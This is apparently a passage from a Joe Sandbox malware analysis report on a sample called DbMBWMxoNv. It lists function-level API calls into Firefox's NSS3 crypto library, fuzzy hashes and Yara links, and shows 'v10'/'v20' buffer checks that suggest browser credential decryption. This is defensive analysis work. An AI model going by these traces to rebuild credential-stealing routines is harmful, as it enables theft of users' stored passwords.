Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 04c45dd0e6af668c6f67b1e2fa6ee9d1e2b2c2aba07b231a4e6c930df4efcc4e
Instruction ID: 7878ce1d673e6890cfff6446c9e8745e5a1de400f58fc097ee0d0acfba63df81
Opcode Fuzzy Hash: 04c45dd0e6af668c6f67b1e2fa6ee9d1e2b2c2aba07b231a4e6c930df4efcc4e
Instruction Fuzzy Hash: 3551B4F6D022006FEB009F64DC81AAF37B8AF4921CF554424ED199BB12FB71ED1586A2

Function 6CF59C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6CF58850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CF60715), ref: 6CF58859
Part of subcall function 6CF58850: PR_NewLock.NSS3 ref: 6CF58874
Part of subcall function 6CF58850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CF5888D

PR_NewLock.NSS3 ref: 6CF59CAD

Part of subcall function 6D0098D0: calloc.MOZGLUE(00000001,00000084,6CF30936,00000001,?,6CF3102C), ref: 6D0098E5

Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307AD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307CD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307D6
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CEC204A), ref: 6CF307E4
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,6CEC204A), ref: 6CF30864
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF30880
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,6CEC204A), ref: 6CF308CB
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308D7
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308FB

TlsGetValue.KERNEL32 ref: 6CF59CE8
EnterCriticalSection.KERNEL32(?,?,6CF5ECEC,6CF62FCD,00000000,?,6CF62FCD,?), ref: 6CF59D01
TlsGetValue.KERNEL32(?,?,?,6CF5ECEC,6CF62FCD,00000000,?,6CF62FCD,?), ref: 6CF59D38
EnterCriticalSection.KERNEL32(?,?,6CF5ECEC,6CF62FCD,00000000,?,6CF62FCD,?), ref: 6CF59D4D
PR_Unlock.NSS3 ref: 6CF59D70
PR_Unlock.NSS3 ref: 6CF59DC3
PR_NewLock.NSS3 ref: 6CF59DDD

Part of subcall function 6CF588D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CF60725,00000000,00000058), ref: 6CF58906
Part of subcall function 6CF588D0: EnterCriticalSection.KERNEL32(?), ref: 6CF5891A
Part of subcall function 6CF588D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CF5894A
Part of subcall function 6CF588D0: calloc.MOZGLUE(00000001,6CF6072D,00000000,00000000,00000000,?,6CF60725,00000000,00000058), ref: 6CF58959
Part of subcall function 6CF588D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CF58993
Part of subcall function 6CF588D0: PR_Unlock.NSS3(?), ref: 6CF589AF

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: bff8049bbc53c09480e0f8cd0c5529259d8db4da8873d72d97d3baca52d802b9
Instruction ID: bef690bdc4120c808cba432036e9f4e0deb64f89a5a9affd11de50a7ddd40222
Opcode Fuzzy Hash: bff8049bbc53c09480e0f8cd0c5529259d8db4da8873d72d97d3baca52d802b9
Instruction Fuzzy Hash: F0518EB1A057059FDB04EF68C08476ABBF0BF54349F458529DA989BB00EB30E9A5CBD1

Function 6CF4DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CF4DCFA

Part of subcall function 6D009DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D050A27), ref: 6D009DC6
Part of subcall function 6D009DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D050A27), ref: 6D009DD1
Part of subcall function 6D009DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D009DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CF4DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CF4DD62
CERT_DestroyCertificate.NSS3(?), ref: 6CF4DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6CF4DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6CF4DD8F

Part of subcall function 6CF606A0: TlsGetValue.KERNEL32 ref: 6CF606C2
Part of subcall function 6CF606A0: EnterCriticalSection.KERNEL32(?), ref: 6CF606D6
Part of subcall function 6CF606A0: PR_Unlock.NSS3 ref: 6CF606EB

CERT_DestroyCertificate.NSS3(?), ref: 6CF4DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6CF4DDB7

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 81d71c56e11f384440d2a4e382c656bae046c7751f3f99961b5424ecfd4cff8a
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 38216FB6E011159BEF01DE95DC40A9FBFB8AF05218F158064ED14A7712E731E915CBE1

Function 6CF43C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6CFB460B,?,?), ref: 6CF43CA9
EnterCriticalSection.KERNEL32(?), ref: 6CF43CB9
PL_HashTableLookup.NSS3(?), ref: 6CF43CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6CF43CD6
PR_Unlock.NSS3 ref: 6CF43CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CF43CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CF43D03
PR_Unlock.NSS3 ref: 6CF43D15

Part of subcall function 6CFEDD70: TlsGetValue.KERNEL32 ref: 6CFEDD8C
Part of subcall function 6CFEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDDB4

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 0edcfdfdbbc9b8a6459bd56aa9ee94464dc172b2b46acdda0b158359cda26ce5
Instruction ID: 12be2edc0f367517a5aa198af6fe3933d1191af765644abf494bf5c8cc3e2efd
Opcode Fuzzy Hash: 0edcfdfdbbc9b8a6459bd56aa9ee94464dc172b2b46acdda0b158359cda26ce5
Instruction Fuzzy Hash: 7B11C6B6C00519A7EF211B35AC05BAE7E78EB4225DF189130ED1893713FB22D95C86D1

Function 6CF49C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF611C0: PR_NewLock.NSS3 ref: 6CF61216

free.MOZGLUE(?), ref: 6CF49E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF49E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF49E4E
TlsGetValue.KERNEL32 ref: 6CF49EA2

Part of subcall function 6CF59500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CF59546

EnterCriticalSection.KERNEL32(?), ref: 6CF49EB6
PR_Unlock.NSS3 ref: 6CF49ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CF49F18

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 59da608a8c7f8821efea52745565680bb6e10206dfa487e4a960d319669bcbc5
Instruction ID: 960f159cd24939d52e23ac55ae41221ae842f11ec1087d31d029e46a11aaf765
Opcode Fuzzy Hash: 59da608a8c7f8821efea52745565680bb6e10206dfa487e4a960d319669bcbc5
Instruction Fuzzy Hash: 6681F9B5A00601ABEB109F34DD41BAB7BEDBF54248F148528ED5587B02FF31EA24C7A1

Function 6CF5DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF5AB10: DeleteCriticalSection.KERNEL32(D958E852,6CF61397,5B5F5EC0,?,?,6CF5B1EE,2404110F,?,?), ref: 6CF5AB3C
Part of subcall function 6CF5AB10: free.MOZGLUE(D958E836,?,6CF5B1EE,2404110F,?,?), ref: 6CF5AB49
Part of subcall function 6CF5AB10: DeleteCriticalSection.KERNEL32(5D5E6D15), ref: 6CF5AB5C
Part of subcall function 6CF5AB10: free.MOZGLUE(5D5E6D09), ref: 6CF5AB63
Part of subcall function 6CF5AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CF5AB6F
Part of subcall function 6CF5AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CF5AB76

TlsGetValue.KERNEL32 ref: 6CF5DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6CF5DD0E
PK11_IsFriendly.NSS3(?), ref: 6CF5DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CF5DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF5DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CF5DEA6
PR_Unlock.NSS3(?), ref: 6CF5DF08

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: eeffa2a8ea55c94f8aad7d96c6b29ddc5106984065532a4c67c8a50e99fe0eb5
Instruction ID: 9f86b6189fcf9cb1d4ed2d75ad27b25756f8ec7ce62744250659c11b117619de
Opcode Fuzzy Hash: eeffa2a8ea55c94f8aad7d96c6b29ddc5106984065532a4c67c8a50e99fe0eb5
Instruction Fuzzy Hash: 9F91C5B5E021059FEB00CF64C980BABB7B5FF64308F954029DE199B741E731E965CBA1

Function 6CF32D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CF32D69

Strings

winTruncate2, xrefs: 6CF32EF8
winUnmapfile2, xrefs: 6CF32F7F
winSeekFile, xrefs: 6CF32E9C
winTruncate1, xrefs: 6CF32EBE
winUnmapfile1, xrefs: 6CF32F55

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 2909a3c13955090ccbe4a917d1fcda9caccce2efeb1e482262b2cee57c86d2ea
Instruction ID: 93791ace01240e5aee6ecce8e6163ac07fb3fc6d612267b0c64548acacf2444e
Opcode Fuzzy Hash: 2909a3c13955090ccbe4a917d1fcda9caccce2efeb1e482262b2cee57c86d2ea
Instruction Fuzzy Hash: 37619F75A01215AFEB04CF68DC94BAE77B1FB49314F148128E9199B7C2DB31AD46CBD0

Function 6CF6DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF6DF37
EnterCriticalSection.KERNEL32(?), ref: 6CF6DF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF6DF96
PR_SetError.NSS3(00000000,00000000), ref: 6CF6E02B
PR_Unlock.NSS3(?), ref: 6CF6E07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CF6E090
PR_Unlock.NSS3(?), ref: 6CF6E0AF

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: 05f7d7a637412a3105936ffbcf480c709e5b5ea24741902c47de4b972cbbfded
Instruction ID: f72cabdb865addeac89655e3a2df4525cb1aa6744b07388ddb23f286702a9a92
Opcode Fuzzy Hash: 05f7d7a637412a3105936ffbcf480c709e5b5ea24741902c47de4b972cbbfded
Instruction Fuzzy Hash: 60519C76900600EFEB209F2ADC44B5B77B5BF45318F204929E89A87F91D735E858CB92

Function 0040A560 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
memset.MSVCRT ref: 0040A60B
LocalAlloc.KERNEL32(00000040,?), ref: 0040A664

Strings

v10, xrefs: 0040A5C6
@, xrefs: 0040A614
v20, xrefs: 0040A571

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: memcmp$AllocLocallstrcpymemset
String ID: @$v10$v20
API String ID: 631489823-278772428
Opcode ID: b80736fe74da25c2430c7378023d73e9146de7285cba7929b037d126561713df
Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
Opcode Fuzzy Hash: b80736fe74da25c2430c7378023d73e9146de7285cba7929b037d126561713df
Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A

Function 6CF6BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CF6BD1E

Part of subcall function 6CF42F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CF42F0A
Part of subcall function 6CF42F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CF42F1D

Part of subcall function 6CF857D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CF4B41E,00000000,00000000,?,00000000,?,6CF4B41E,00000000,00000000,00000001,?), ref: 6CF857E0
Part of subcall function 6CF857D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CF85843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF6BD8C

Part of subcall function 6CF9FAB0: free.MOZGLUE(?,-00000001,?,?,6CF3F673,00000000,00000000), ref: 6CF9FAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6CF6BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CF6BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CF6BE3A

Part of subcall function 6CF43E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF43EC2
Part of subcall function 6CF43E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CF43ED6
Part of subcall function 6CF43E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CF43EEE
Part of subcall function 6CF43E60: PR_CallOnce.NSS3(6D0A2AA4,6CFA12D0), ref: 6CF43F02
Part of subcall function 6CF43E60: PL_FreeArenaPool.NSS3 ref: 6CF43F14
Part of subcall function 6CF43E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF43F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CF6BE52

Part of subcall function 6CF42E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CF42CDA,?,00000000), ref: 6CF42E1E
Part of subcall function 6CF42E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CF42E33
Part of subcall function 6CF42E00: TlsGetValue.KERNEL32 ref: 6CF42E4E
Part of subcall function 6CF42E00: EnterCriticalSection.KERNEL32(?), ref: 6CF42E5E
Part of subcall function 6CF42E00: PL_HashTableLookup.NSS3(?), ref: 6CF42E71
Part of subcall function 6CF42E00: PL_HashTableRemove.NSS3(?), ref: 6CF42E84
Part of subcall function 6CF42E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CF42E96
Part of subcall function 6CF42E00: PR_Unlock.NSS3 ref: 6CF42EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CF6BE61

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 7fb27e4039189b5a34ec7c9f09c0a623545a616cffb6e725292ad9d123337ffd
Instruction ID: deb2bcdfb41f8b695f57412521251d25484cf66844d68dd85f7665784a7a1886
Opcode Fuzzy Hash: 7fb27e4039189b5a34ec7c9f09c0a623545a616cffb6e725292ad9d123337ffd
Instruction Fuzzy Hash: 1B41E476A00210AFDB10DF29DC80BAA77E4EF45718F148568F9099BB52E731ED08DB92

Function 6CF8AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CF8AB3E,?,?,?), ref: 6CF8AC35

Part of subcall function 6CF6CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CF6CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CF8AB3E,?,?,?), ref: 6CF8AC55

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CF8AB3E,?,?), ref: 6CF8AC70

Part of subcall function 6CF6E300: TlsGetValue.KERNEL32 ref: 6CF6E33C
Part of subcall function 6CF6E300: EnterCriticalSection.KERNEL32(?), ref: 6CF6E350
Part of subcall function 6CF6E300: PR_Unlock.NSS3(?), ref: 6CF6E5BC
Part of subcall function 6CF6E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CF6E5CA
Part of subcall function 6CF6E300: TlsGetValue.KERNEL32 ref: 6CF6E5F2
Part of subcall function 6CF6E300: EnterCriticalSection.KERNEL32(?), ref: 6CF6E606
Part of subcall function 6CF6E300: PORT_Alloc_Util.NSS3(?), ref: 6CF6E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CF8AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF8AB3E), ref: 6CF8ACD7
PORT_Alloc_Util.NSS3(?), ref: 6CF8AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CF8AD2B

Part of subcall function 6CF6F360: TlsGetValue.KERNEL32(00000000,?,6CF8A904,?), ref: 6CF6F38B
Part of subcall function 6CF6F360: EnterCriticalSection.KERNEL32(?,?,?,6CF8A904,?), ref: 6CF6F3A0
Part of subcall function 6CF6F360: PR_Unlock.NSS3(?,?,?,?,6CF8A904,?), ref: 6CF6F3D3

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 6430a4bd2fb601e88626a8d03c32794842674903c944d64bbad2ec33a99e1957
